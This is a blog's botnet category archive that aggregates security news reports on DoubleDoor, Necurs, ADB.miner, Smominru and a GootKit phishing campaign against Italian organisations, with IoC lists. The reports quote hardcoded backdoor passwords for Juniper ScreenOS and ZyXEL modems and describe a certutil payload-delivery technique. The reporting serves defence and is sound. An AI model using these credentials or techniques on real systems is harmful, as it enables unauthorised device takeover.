Category Archives: botnet

IoT botnet bypasses firewalls to get to ZyXEL modems

NewSky Security’s honeypots have detected a new IoT botnet in the making. The botnet was named DoubleDoor, as it leverages two distinct backdoors to get to the target: ZyXEL PK5001Z modems. The DoubleDoor attacks What’s interesting about this particular botnet is that it’s ready to pass an extra layer of security to get to the modem: Juniper Networks’ NetScreen hardware firewall devices. To pull off the attack, it employs exploits for two vulnerabilities: CVE-2015–7755, which … More

What Is a Botnet?

Robot armies on attack may sound like science fiction, but this is a security reality we’ve been facing for some time. You may have heard of recent threats where popular websites were knocked completely offline, or servers were forced to mine for crypto currencies by giant “botnets”. But you might not have known exactly what a botnet is, and how the devices in your home could easily become part of one.

A botnet is a collection of connected devices, or “bots” (short for robots), that are infected and controlled by malware. These devices could include your PC, webcam, or any number of connected appliances in your home. The cybercriminals who distribute malware to create botnets are generally looking to use the combined computing power of all the infected devices to launch much larger attacks.

Take, for example, the Mirai botnet, which infected millions of consumer devices such as IP cameras and home routers to launch a distributed denial of service attack that was able to cripple major websites such as Netflix, Twitter, and Reddit. Mirai took advantage of the low-level of security on most home connected devices. All the malware had to do was guess a password—many of which are known factory defaults—to seize control.

Botnets have been around for a long time, with the first instances recorded in the early 2000s as a way to send massive amounts of spam emails. But these days cybercriminals are eyeing the huge computing potential of millions of IoT devices to create botnets that can launch targeted attacks, or make money.

Some large botnets have become money-making enterprises unto themselves, with cybercrooks reselling their resources to users who want to launch their own attacks, say against online gaming rivals.

But, no matter what a botnet is used for there are a number of reasons why you don’t want your computers and devices to wind up as part of a nefarious network. Botnet malware can significantly slow down your computer or device, and keep it from functioning properly. In the case of computers, this slowdown can potentially keep you from downloading critical security updates, leaving you at an even greater risk for data theft. The malware can also be used to spam your friends and contacts in your name, and launch attacks against other networks, all without your knowledge.

Follow these important tips to keep your devices from joining the botnet army: 

  • Change Device Passwords—The first thing you want to do when you get a new IoT device is to change its default password, making it much harder for a potential attacker to gain access. Check your user’s manual for security settings. If the device has little or no built-in security, consider investing in more secure devices.
  • Keep your software up-to-date—This goes for both computer software and device firmware. Manufacturers regularly release software updates that can protect you from known vulnerabilities, so you want to make sure that you are always running the latest versions.
  • Always Use a Firewall—Firewalls monitor traffic between your Internet connection and your devices to detect unusual behavior. Even if one of your devices is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. Firewalls are often included in comprehensive security software, ensuring that all your computers and devices have protection.
  • Setup a Separate IoT Network—Instead of putting all your IoT devices on your regular home network, consider setting up a guest network that doesn’t share access to your other devices and data. Check your router manufacturer’s website to learn how. Or, consider getting a router with built-in security features, making it easier to protect all the devices in your home from one access point.
  • Practice Safe Surfing—So called “drive by” malware, which can infect your device simply by visiting a compromised website, or clicking on a dangerous ad, is being increasingly used to create botnets. In fact, millions of websites are now thought to be infected with crypto-mining malware. That’s why it’s important to be careful where you click. Make sure that you are using antivirus software, and that you enable ad blocking.

    And to prevent your computer from being infected with crypto mining software specifically, you may also consider installing a browser extension such as Chrome’s No Coin, or Opera for Android. Both actively block coin miners.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What Is a Botnet? appeared first on McAfee Blogs.

DoubleDoor IoT Botnet Abuses Two Vulnerabilities to Circumvent Firewalls, Modems

The DoubleDoor Internet of Things (IoT) botnet circumvents firewall protection and other security measures by abusing two vulnerabilities. Detected by NewSky Security in its honeypot logs, DoubleDoor begins by deploying CVE-2015-7755. The vulnerability allows remote attackers to gain administrative access to ScreenOS, an operating system for Juniper Networks’ hardware firewall devices, by entering a hardcoded […]… Read More

The post DoubleDoor IoT Botnet Abuses Two Vulnerabilities to Circumvent Firewalls, Modems appeared first on The State of Security.

Valentine’s Day malware surge is a test of corporate email defences

It may be a day for love and for lovers, but Valentine’s Day is also living up to expectations as a magnet for cybercriminal activity.Advising of an ongoing dating-spam campaign

The post Valentine’s Day malware surge is a test of corporate email defences appeared first on The Cyber Security Place.

DoubleDoor, a new IoT Botnet bypasses firewall using two backdoor exploits

Security researchers spotted a new IoT botnet dubbed DoubleDoor that is able to bypass firewall as well as modem security using two backdoor exploits.

IoT devices continue to be a privileged target of cyber criminals, cyber attackers against so-called smart objects has seen a rapid evolution. Security researchers at NewSky Security (NewSky Security) have detected a new IoT botnet dubbed DoubleDoor that is able to bypass firewall as well as modem security using two backdoor exploits.

The analysis of the honeypot logs allowed the researchers to detect the new threat, it leverages two known backdoor exploits to manage two levels of authentications.

The first malicious code is the Juniper Networks SmartScreen OS exploit, it triggers the flaw CVE-2015–7755 to bypass the firewall authentication.

CVE-2015–7755 hardcoded backdoor affects the Juniper Networks’ ScreenOS software that powers their Netscreen firewalls.

“Essentially the telnet and SSH daemons of Netscreen firewalls can be accessed by using the hardcoded password <<< %s(un=’%s’) = %u with any username, regardless of it being valid or not.We saw its implementation in the initial attack cycle of DoubleDoor as it attacked our honeypots with username “netscreen” and the backdoor password.” wrote Ankit Anubhav, Principal Researcher, NewSky Security.

Once succeeded, the malicious code uses the CVE-2016–10401 Zyxel modem backdoor exploit to take full control over the IoT device.

The code is a privilege escalation exploit, “which is why the DoubleDoor attackers also performed a password based attack to get a basic privilege account like admin:CenturyL1nk before going for the superuser.”

“This time it was CVE-2016–10401 , a backdoor for ZyXEL PK5001Z devices. This backdoor is straight forward too, with a hardcoded su password as zyad5001.” continues the expert.

DoubleDoor

The experts highlighted that differently from other IoT botnets like Satori or Masuta, the DoubleDoor botnet doesn’t use a unique string in the reconnaissance phase.

“after the threat actors have performed the attack, they want a confirmation whether they were successful of getting control of the IoT device. For this, they try to invoke the shell with invalid commands. If the attacker has succeeded, it will show “{string}: applet not found” where {string} is the invalid command.” observed the research.

“DoubleDoor botnet takes care of this, by using a randomized string in every attack”

The DoubleDoor botnet seems to be in an early stage, most of the attacks are originated from South Korean IPs.

The botnet includes the code to target a limited number of devices, it will succeed only if the victim has a specific unpatched version of Juniper ScreenOS firewall which protects unpatched Zyxel modems.

“Double layer of IoT protection is more common in corporate environments, which don’t rely on built-in IoT authentication and like to protect it with another layer of firewall. Although such corporate devices can be lesser in number, getting control of corporate environment routers can be more valuable for an attacker as it can lead to targeted IoT attacks.” concluded the experts.

Pierluigi Paganini

(Security Affairs – DoubleDoor , IoT botnet)

The post DoubleDoor, a new IoT Botnet bypasses firewall using two backdoor exploits appeared first on Security Affairs.

Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April 2017. The Necurs botnet was used in the past months to push many other malware, including LockyJaffGlobeImposterDridex , Scarab and the Trickbot.

Scammers are mow using the Necurs botnet to send out an amazing number of messages offering companionship waiting for Valentine’s day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January, it leverages the overall Necurs botnet that is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The expert spotted two current campaigns that sent out a total 230 million spam messages in 14 days-period.

necurs spammers valentines day

 

The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.”

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses, Most of IP are hosted in Vietnam and India while the top sender IP address is hosted via a Pakistani-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns, for this reason, the most effective countermeasure is to increase employee awareness on such kind of threats.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.

Security Affairs: Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April 2017. The Necurs botnet was used in the past months to push many other malware, including LockyJaffGlobeImposterDridex , Scarab and the Trickbot.

Scammers are mow using the Necurs botnet to send out an amazing number of messages offering companionship waiting for Valentine’s day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January, it leverages the overall Necurs botnet that is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The expert spotted two current campaigns that sent out a total 230 million spam messages in 14 days-period.

necurs spammers valentines day

 

The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.”

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses, Most of IP are hosted in Vietnam and India while the top sender IP address is hosted via a Pakistani-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns, for this reason, the most effective countermeasure is to increase employee awareness on such kind of threats.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.



Security Affairs

IoTroop botnet: How to protect yourself from the cyber-storm of the century

The IoTroop botnet, which shares an extensive code base with the leaked Mirai source code, stands to cause even more damage than its predecessor.Almost one year ago exactly, computers across

The post IoTroop botnet: How to protect yourself from the cyber-storm of the century appeared first on The Cyber Security Place.

Android devices roped into new Monero-mining botnet

A new Monero-mining bot sprang up a few days ago and, in just a few days, has created a botnet consisting of over 7,000 Android devices, most of which are located in China (39%) and Korea (39%). Spreading capabilities The rise of the botnet has been flagged by researchers with Qihoo 360’s Netlab, who analyzed the mining malware and discovered that it has worm-like spreading capabilities. Once ADB.miner – as they’ve dubbed the threat – … More

E Hacking News – Latest Hacker News and IT Security News: A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3 focused entirely on Android gadgets precisely being port 5555, which on gadgets running the Android OS is the port utilized by the operating system's native Android Debug Bridge (ADB), a troubleshooting interface which awards access to a portion of the operating system's most sensitive features.

The reason why being so that by checking for open troubleshoot ports it can infect victims with malware that mines the Monero cryptocurrency.

As per security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, the ones who discovered the botnet, named ADB.miner , just gadgets, for example, cell phones, smart TVs, and television top boxes, running the Android OS have been tainted as of not long ago.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet gives off an impression of being aggressive and continues growing every day, with 
infected devices filtering the Web for other victims. As of now, the Botnet seems to have infected around 7,400 devices as detected by Netlab.


Recently scanning for this port 5555, shot to the #4 spot in Netlab's most scanned ports as opposed to the previous account, as it wasn't even in the top 10.


Most IP addresses to checking for different devices (which means they are now infected) are situated in China (~40%) and South Korea (~30%). Yiming informed further that the botnet has generally infected  "television related" devices, instead of smartphones.
  
Netlab says ADB.miner utilized some of Mirai's port scanning code also marks the first time an Android malware strain has obtained code from Mirai, a strain of Linux-based malware that was previously focused on just systems administration i.e. Networking and IoT devices.

All the same, the researchers still haven't given any insights with respect to the ADB vulnerability  the attackers are using to take control over devices however cleared up that they don't think the bug is particular to a specific seller (vendor). This in all probability implies that the bug influences the centre of the Android ADB segment itself.



E Hacking News - Latest Hacker News and IT Security News

A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3 focused entirely on Android gadgets precisely being port 5555, which on gadgets running the Android OS is the port utilized by the operating system's native Android Debug Bridge (ADB), a troubleshooting interface which awards access to a portion of the operating system's most sensitive features.

The reason why being so that by checking for open troubleshoot ports it can infect victims with malware that mines the Monero cryptocurrency.

As per security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, the ones who discovered the botnet, named ADB.miner , just gadgets, for example, cell phones, smart TVs, and television top boxes, running the Android OS have been tainted as of not long ago.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet gives off an impression of being aggressive and continues growing every day, with 
infected devices filtering the Web for other victims. As of now, the Botnet seems to have infected around 7,400 devices as detected by Netlab.


Recently scanning for this port 5555, shot to the #4 spot in Netlab's most scanned ports as opposed to the previous account, as it wasn't even in the top 10.


Most IP addresses to checking for different devices (which means they are now infected) are situated in China (~40%) and South Korea (~30%). Yiming informed further that the botnet has generally infected  "television related" devices, instead of smartphones.
  
Netlab says ADB.miner utilized some of Mirai's port scanning code also marks the first time an Android malware strain has obtained code from Mirai, a strain of Linux-based malware that was previously focused on just systems administration i.e. Networking and IoT devices.

All the same, the researchers still haven't given any insights with respect to the ADB vulnerability  the attackers are using to take control over devices however cleared up that they don't think the bug is particular to a specific seller (vendor). This in all probability implies that the bug influences the centre of the Android ADB segment itself.

The new gold rush: A look inside cryptocurrency fraud

Cybercriminals are flooding to the new world of cryptocurrencies looking to exploit the boom in interest and adoption of these electronic currencies, according to Digital Shadows. This new gold rush is creating a new frontier for professional cybercriminals moving away from less profitable techniques and exploits to make money on the back of the huge interest in these digital currencies. With over 1,400 cryptocurrencies in circulation, and new alternative coins – “altcoins” – emerging every … More

A New Cryptomining Botnet Called Smominru Infected Over 500 Thousand Windows Machines

Security researchers from Proofpoint (cybersecurity firm) have discovered that over 500 thousand Windows machines have been infected with Cryptomining malware

The post A New Cryptomining Botnet Called Smominru Infected Over 500 Thousand Windows Machines appeared first on Latest Hacking News.

Massive Smominru Cryptocurrency Botnet Rakes In Millions

Researchers say Smominru threat actors are in control of 500,000 node botnet and earning $8,500 daily mining for Monero cryptocurrency.

Mining Smominru botnet used NSA exploit to infect more than 526,000 systems

Researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ that is using the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

The number of cyber attacks against the cryptocurrency sector continues, vxers are focusing their efforts on the development of cryptocurrency/miner malware.

Recently security experts observed cryptocurrency miners leveraging the NSA EternalBlue SMB exploit (CVE-2017-0144) as spreading mechanism.

On August 2017, a new fileless miner dubbed CoinMiner appeared in the wild, it uses NSA EternalBlue exploit and WMI tool to spread.

Now researchers Researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ (aka Ismo) that is using the EternalBlue exploit (CVE-2017-0144) to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

” Because obtaining these cryptocurrencies through legitimate mining mechanisms is quite resource-intensive, cybercriminals are stealing them, demanding ransomware payments  in them, and harnessing other computers to mine them for free. Recently, Proofpoint researchers have been tracking the massive Smominru botnet, the combined computing power of which had earned millions of dollars for its operators.” states the analysis published by Proofpoint

With the help of Abuse.CH and the ShadowServer Foundation, Proofpoint conducted a sinkholing operation that allowed to profile the botnet.

The command and control infrastructure of the Smominru botnet is hosted on DDoS protection service SharkTech, Proofpoint promptly notified the abuse to the service provider without receiving any response.

According to the researchers, the Smominru botnet has been active at least since May 2017 and has already infected more than 526,000 Windows computers.

Most of the infected systems are servers distributed worldwide, most of them in Russia, India, and Taiwan. It is a profitable business, the operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).

“Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz,” the researchers said. “The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week (Figure 2).”

smominru botnet

The researchers at Proofpoint discovered that crooks are using at least 25 hosts to scan the Internet for EternalBlue vulnerable Windows computers and also leveraging the NSA EsteemAudit (CVE-2017-0176) for compromising the target machines.

The machines all appear to sit behind the network autonomous system AS63199, further technical details and the IoCs are included in the analysis published by Proofpoint.

“Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity. The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations.” concluded the Proofpoint.

“Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes. We also expect botnets like that described here to become more common and to continue growing in size.”

 

Pierluigi Paganini

(Security Affairs – Smominru botnet, Monero)

The post Mining Smominru botnet used NSA exploit to infect more than 526,000 systems appeared first on Security Affairs.

Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit

2017 was the year of high profile data breaches and ransomware attacks, but from the beginning of this year, we are noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals. Several cybersecurity firms are reporting of new cryptocurrency mining viruses that are being spread using EternalBlue—the

Smart Homes May Hide Crypto Mining Schemes

Loosely attended smart home appliances may be platforms for cryptocurrency mining scams, a researcher with the firm IOActive warns. Is your smart refrigerator or connected dishwasher secretly mining Moreno or Bitcoin on the sly? It’s a possibility that experts at the firm IOActive say homeowners, regulators and device makers need to be...

Read the whole entry... »

Related Stories

New Rapidly-Spreading Hide and Seek IoT Botnet Identified by Bitdefender

BitDefender has identified a new fast-spreading IoT botnet called Hide and Seek that has the potential to perform information theft for espionage or extortion. Bitdefender security researchers have spotted a fast-spreading, shape-shifting new botnet that can hack IoT devices and potentially perform widespread information theft for espionage or...

Read the whole entry... »

Related Stories

Security Affairs: Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet

Threat actors with a deep knowledge of the Fiscal Italian ecosystem are using a huge botnet to target Italian companies and Ministry of the Interior.

On February 18 a colleague of mine (Luca) called me telling a malicious email was targeting Italian companies. This is the beginning of our new analysis adventure that Luca and I run together.

The email pretended to be sent by “Ministero dell’ Economia e delle Finanze” the Italian Department of Treasury  and it had smart subjects such as:

    • Codici Tributo Acconti
    • F24 Acconti-Codice Tributo 4034

The attacker knows very well the Italian Fiscal Year since those modules are very popular from company administration employees at that time. The attacker would probably exploit this attack path reaching out as many companies as possible. The email address was not coming from the “Ministero dell’ economia e delle Finanze” at all, it was coming from the following addresses:

    • info@amber-kate.com
    • info@fallriverproductions.com

The email looks like :

 Huge Botnet Attacking Italian Companies
Malicious eMail

A simple link pointing to a high reputation domain was popping out the default browser and downloading the following Javascript file. The high level of obfuscation and the way the content was provided was so suspicious to be worth to follow the analysis.

 
Infection: Stage 1 Obfuscated

After a deobfuscation phase the javascript looked much more easy te be read from a human side.

 
Infection: Stage 1 Clear Text

A romantic “drop and execute” section was happening. A GET connection to 239outdoors.com/themes5.php was dropping a file named 1t.exe and later on the same script was able to execute the dropped file.  The file 1t.exe was running on the victim machine contacting the Command and Control waiting for further commands.

The new sample looks like GootKit, a weaponized version of Banker Malware.  The malware installs itself and contacts Command and Control asking “what to do” and sending the “stolen credentials” directly to the Command and Control server. Details on IPs, Persistencies and so on, is provided in the IoC section, but today’s we won’t describe GootKit, we got access to the Dropping site!

We want to figure out if we might help victims to deactivate the malicious botnet by providing as much as possible details without focusing on the reverse the Malware per se since appears to be known.

By getting further analyzing the dropping website we immediately understood that the same URL was dropping another threat. The parallel threat the dropping website was spreading to the world was called “Nuovo Documento 2008” and it was a .bat file as follows.

 
New Threat Stage 1

That executable .bat file on a first stage opens up a browser pointing to a legitimate image but later on, it uses a notorious technique called “certutil for delivery of file” to drop and execute another file. This technique is well described here  by carnal0wnage. Basically, the attacker uses the certutil.exe program do download a Base64 encoded payload, to decode it and to run it. This technique is very silent since the User-Agent of certutils.exe is not suspicious because it needs to connect outside the company networks to check certificates, so not much IPS rules on it. The dropped file name unslss.exe appears to be very close to the previously analyzed one (1t.exe) it contacts the same C&C and it behaves in a similar way.   But again we won’t focus on reverse such a malware but rather we wont be able to reach the highest number of IoC to protect as much as possible the victims. By analyzing the Dropping website we founded that a significative number of connections had additional referrers, so we decided to focus our attention on how many DNS were pointing to such a domain. We did it and the result was quite impressive (please see the Dropping URLs IoC Section).

Following the research on the dropping website, we found an interesting log of all the connection coming from possible victims. We collected that log, and we built the following possible infection list (possible Victims). We won’t publish the Victims IP addresses but if you can prove you are legitimated by your company to ask that logs we can give you (for free, of course)  the IP addresses we’ve found related to your company. A detailed list of possible infected networks follows.

Possible Victims:

  • ACI informatica s.p.a.
  • AGOS-AS
  • AGSM Verona Spa
  • ASGARR Consortium GARR
  • Acantho S.p.a
  • Alfanews S.r.l.
  • Ambrogio s.r.l.
  • Asco TLC S.p.A.
  • Autostrade-as
  • BT Italia
  • BT Italia S.p.A.
  • Banca Monte Dei Paschi Di Siena S.P.A.
  • Brennercom S.p.A.
  • COLT Technology Services Group Limited
  • Camera dei deputati
  • Cesena Net srl
  • Clouditalia Telecomunicazioni S.p.A.
  • Comune Di Brescia
  • Comune di Bologna
  • Consortium GARR
  • Consorzio per il Sistema Informativo
  • Costacrociere-as
  • Duebite-as
  • E4A s.r.l.
  • Energente S.r.l.
  • FASTNET SpA
  • FASTWEB SPA
  • FINECO Banca del Gruppo Unicredit
  • Fastweb
  • Forcepoint Cloud Ltd
  • GenyCommunications
  • Global Com Basilicata s.r.l.
  • H3G Italy
  • Hynet S.R.L.
  • IBSNAZ
  • ICT Valle Umbra s.r.l.
  • InAsset S.r.l.
  • InfoCamere SCpA
  • Infracom Italia S.p.A.
  • Inrete s.r.l
  • Insiel- Informatica per il sistema degli enti loca
  • Integrys.it di Stefania Peragna impresa individual
  • Intred S.p.A.
  • KPNQWest Italia S.p.a.
  • LEPIDA
  • Lepida S.p.A.
  • Liguria Digitale S.C.p.A.
  • Linea Com S R L
  • Linkem spa
  • Lombardia Informatica S.p.A.
  • Mandarin S.p.A.
  • Mc-link SpA
  • Metrolink S.R.L.
  • Ministero dell’Interno
  • Mnet srl
  • NGI SpA
  • Nemo S.r.l.
  • Nordcom S.p.a.
  • Officine Informatiche Srl
  • Progetto Evo S.r.l.
  • Provincia di Reggio nell’Emilia
  • Qcom spa
  • Raiffeisen OnLine GmbH
  • Regione Basilicata
  • Regione Toscana
  • Regione Veneto
  • STI ADSL
  • Sardegnait-as
  • Societa’ Gestione Servizi Bp S.p.A.
  • TELEX S.r.l.
  • TWT S.p.A.
  • Telecom Italia
  • Terra S.p.a.
  • Time-net S.r.l.
  • Tiscali SpA
  • Trenitalia SpA
  • Trentino Network S.r.l.
  • Universita’ degli Studi di Milano
  • Venis S.p.A.
  • Videotime SPA
  • Vodafone Group Services GmbH
  • Vodafone Italia DSL
  • Vodafone Omnitel B.V.
  • Vodafone Omnitel N.v.
  • WIIT S.p.A.
  • Welcome Italia S.p.A
  • Wind Telecomunicazioni
  • Wind Telecomunicazioni SpA

Following the found IoC provided by the long “analysis journey”. I managed this analysis over the night, so I am sure there would be some imprecisions, but I preferred to speed up the entire analysis process to give the opportunity to block such infamous threat as soon as possible.

Hope it helps the community.

IoC:

  • eMail:
  • info@amber-kate.com
  • info@fallriverproductions.com
  • Dropping URLS:
  • 185.61.152.71
  • 239outdoors.com
  • bentlabel.com
  • cdvdautomator.com
  • cloudblueprintprogram.com
  • cnchalftone.com
  • comedyyall.com
  • conticellolaw.com
  • couplesdoingbusiness.com
  • dvoper.com
  • equinnex.com
  • ericandchrissy.com
  • evelynleekley.com
  • expungementstennessee.com
  • flaveme.com
  • grkisland.com
  • healingfoodconsulting.com
  • hertzsynergy.com
  • hollywoodisruption.com
  • home-sphere.com
  • integrativenutritiontherapy.com
  • jdkanyuk.com
  • kineloveclips.com
  • kylesinger.com
  • legionchristmas.com
  • menshoesonlinestore.com
  • microtiasurgery.com
  • movielotbar.com
  • muiienweg.com
  • niarhoslondon.com
  • opsantorinitours.com
  • progunjobs.com
  • rocketpak.com
  • scottishwindowsolutions.com
  • silkygames.com
  • snapshotsandwhatnots.com
  • snotterkind.com
  • solespin.com
  • strangerthanchristmas.com
  • synchronr.com
  • taramadden.com
  • terento.website
  • theargumint.com
  • thegildedwren.com
  • thejourneytogodsheart.com
  • thesaltybody.com
  • topsantorinitours.com
  • tuftandneedles.com
  • videospanishlessons.com
  • vovachka.com
  • wall-runners.com
  • war-arena.com
  • www.scottishwindowsolutions.com
  • z1logistics.com
  • zayantetinyhomes.com
  • zefeed.com
  • Command and Controls
  • 185.44.105.97
  • ns15.dreamsinthesun.com
  • bdi2.nomadicdecorator.com
  • elis.k9redemptionrescue.com
  • api.hailstorm360.com
  • cerera.survivalbid.com
  • mark.k9redemptionrescue.org
  • nsc.dayswithsunrays.com
  • at.moonbeammagic.com
  • ssl.vci-cfo.com
  • sip3.propertiesandprojects.com
  • host1.jodiray.com
  • note.lawrencechoy.com
  • note.lawrencechoy.com:80
  • 185.44.105.97:80/200
  • note.lawrencechoy.com:80
  • Hashes
  • 63d6927881d4978da4e162c17d82e9c009d0a93e
  • 7ea33f51b6c4aa54beee7fd878886339c22d2232
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b
  • 839ff9f4c3980ac67d4cbef296520ee364a0911f
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b

The original post published by Marco Ramilli on his blog at the following URL:

Huge Botnet Attacking Italian Companies

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – botnet, hacking)

The post Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet appeared first on Security Affairs.



Security Affairs

Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet

Threat actors with a deep knowledge of the Fiscal Italian ecosystem are using a huge botnet to target Italian companies and Ministry of the Interior.

On Januaty 18 a colleague of mine (Luca) called me telling a malicious email was targeting Italian companies. This is the beginning of our new analysis adventure that Luca and I run together.

The email pretended to be sent by “Ministero dell’ Economia e delle Finanze” the Italian Department of Treasury  and it had smart subjects such as:

    • Codici Tributo Acconti
    • F24 Acconti-Codice Tributo 4034

The attacker knows very well the Italian Fiscal Year since those modules are very popular from company administration employees at that time. The attacker would probably exploit this attack path reaching out as many companies as possible. The email address was not coming from the “Ministero dell’ economia e delle Finanze” at all, it was coming from the following addresses:

    • info@amber-kate.com
    • info@fallriverproductions.com

The email looks like :

 Huge Botnet Attacking Italian Companies
Malicious eMail

A simple link pointing to a high reputation domain was popping out the default browser and downloading the following Javascript file. The high level of obfuscation and the way the content was provided was so suspicious to be worth to follow the analysis.

 
Infection: Stage 1 Obfuscated

After a deobfuscation phase the javascript looked much more easy te be read from a human side.

 
Infection: Stage 1 Clear Text

A romantic “drop and execute” section was happening. A GET connection to 239outdoors.com/themes5.php was dropping a file named 1t.exe and later on the same script was able to execute the dropped file.  The file 1t.exe was running on the victim machine contacting the Command and Control waiting for further commands.

The new sample looks like GootKit, a weaponized version of Banker Malware.  The malware installs itself and contacts Command and Control asking “what to do” and sending the “stolen credentials” directly to the Command and Control server. Details on IPs, Persistencies and so on, is provided in the IoC section, but today’s we won’t describe GootKit, we got access to the Dropping site!

We want to figure out if we might help victims to deactivate the malicious botnet by providing as much as possible details without focusing on the reverse the Malware per se since appears to be known.

By getting further analyzing the dropping website we immediately understood that the same URL was dropping another threat. The parallel threat the dropping website was spreading to the world was called “Nuovo Documento 2008” and it was a .bat file as follows.

 
New Threat Stage 1

